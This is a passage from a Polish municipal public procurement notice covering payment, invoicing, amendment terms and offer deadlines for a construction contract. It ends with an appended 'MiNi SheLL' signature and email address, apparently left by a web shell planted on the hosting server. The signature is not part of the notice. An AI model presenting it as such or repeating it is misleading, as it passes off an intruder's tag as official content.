<br/>i zatwierdzonego przez Zamawiającego oraz po przekazaniu Zamawiającemu decyzji pozwolenia <br/>na użytkowanie, zgodnie z ustawą Prawo budowlane, przy czym z kwoty faktury wystawionej <br/>po zrealizowaniu pełnego zakresu robót odliczona zostanie kwota udzielonej zaliczki.<br/>6.	Faktura końcowa płatna będzie przelewem w terminie do 35 dni, licząc od daty otrzymania przez Zamawiającego prawidłowo wystawionej faktur VAT. Za datę zapłaty uważać się będzie dzień obciążenia rachunku bankowego Zamawiającego. <br/>7.	Wykonawca zobowiązany jest do doręczenia Zamawiającemu faktury VAT wraz z dokumentami <br/>o których mowa w § 5 ust. 10 (jeżeli wykonuje roboty z udziałem podwykonawców), na co najmniej <br/>10 dni przed określonym na fakturze VAT terminem płatności a w razie niezachowania tego terminu, termin płatności wskazany w fakturze VAT zostanie automatycznie przedłużony o czas opóźnienia doręczenia faktury VAT.<br/>8.	W przypadku przedstawienia przez Wykonawcę nieprawidłowo (w rozumieniu umowy i / lub przepisów<br/>o VAT) wystawionych faktur VAT, Zamawiający ma prawo odmówić ich przyjęcia bez negatywnych <br/>dla siebie konsekwencji. W takim wypadku objęte fakturami należności nie będą traktowane jako wymagalne i nie będą pociągać za sobą obciążenia Zamawiającego ewentualnymi odsetkami <br/>za opóźnienie w płatności.<br/>9.	Faktury należy wystawić na: Gmina Chrzypsko Wielkie, ul. Główna 15, 64-412 Chrzypsko Wielkie, <br/>NIP: 595-146-12-75.<br/>10.	Wykonawca nie ma prawa, pod rygorem nieważności, do przeniesienia wierzytelności z tytułu wynagrodzenia za zrealizowany przedmiot umowy na osobę trzecią (przelew, cesja) bez uprzedniej pisemnej zgody Zamawiającego. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Postanowienia umowy zawiera wzór umowy stanowiący Załącznik nr 7 do SWZ. Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach określonych we Wzorze Umowy. Przed podpisaniem umowy Wybrany Wykonawca poproszony zostanie o przedłożenie kosztorysu, w celu ustalenia kosztów poszczególnych elementów zamówienia.<br/>2. Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.<br/>3. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 p.z.p. oraz wskazanym we Wzorze Umowy, stanowiącym Załącznik nr 7 do SWZ.<br/>4. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej.<br/>5.	Ewentualne spory powstałe podczas i w związku z wykonywaniem niniejszej umowy, strony poddają rozstrzygnięciu Sądowi Polubownemu przy Prokuratorii Generalnej Rzeczypospolitej Polskiej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-12 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu. Pozostałe wymogi w SWZ</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-12 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-06-10</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com